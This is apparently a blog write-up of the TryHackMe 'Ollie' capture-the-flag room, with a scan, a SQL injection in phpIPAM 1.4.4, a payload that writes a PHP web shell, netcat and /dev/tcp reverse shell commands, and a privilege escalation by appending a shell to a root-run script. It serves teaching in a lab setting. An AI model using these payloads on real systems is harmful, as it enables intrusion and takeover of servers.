TryHackMe: Ollie

Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146

1337 port Enumeration

Command: nc IP 1337

Yes, this is a simple chat correspondence. In the end, we get the necessary credential

I tried to log in to Ollie with SSH, but it didn’t work.

Let’s take a look at the website now.

It is a simple login page. Let’s enter with the credential we have.

I did research on phpIPAM. And it turned out that version 1.4.4 has a vulnerability to sql injection.

Let’s check here

Go to the Routing section

Go to the example in the Peer Name section. Click the Actions button and select Subnet mapping

Now let’s check the vulnerability.

Command: “union select @@version,2,user(),4 — -

It works. Now let’s create rce

Command: “ union select null,null,null,”<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/backdoor.php” — -

Reverse shell weed. But keep in mind that you need to encode the url as you type in the url section.

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20IP%204242%20%3E%2Ftmp%2Ff%0A

As soon as I received the reverse shell, I changed the user using the previous data.

Privilege Escalation

Command: find / -group ollie 2>/dev/null

There are some interesting results. But this was the most interesting.

After checking it, I saw that it works as root, and I used it to enter the reverse shell command.

Command: echo ‘bash -i >& /dev/tcp/IP/4444 0>&1’ >> /usr/bin/feedme

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Configuring an ECS Fargate service with AWS Application Loadbalancer.

74 days to become a Game Developer. Day 10.

How to use Animate.css

The Times of Predicament

My Journey as a Software Developer

1st Project Building a CLI with Ruby

Beginner’s guide to use docker (Build, Run, Push and Pull)

Day 9: Become a self-taught blockchain developer with zero knowledge in 365 days

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Daily Bugle — TryHackMe

Tryhackme Git Happens

Hack This Site: Extended Basic — Mission 5

Hack This Site: Extended Basic — Mission 5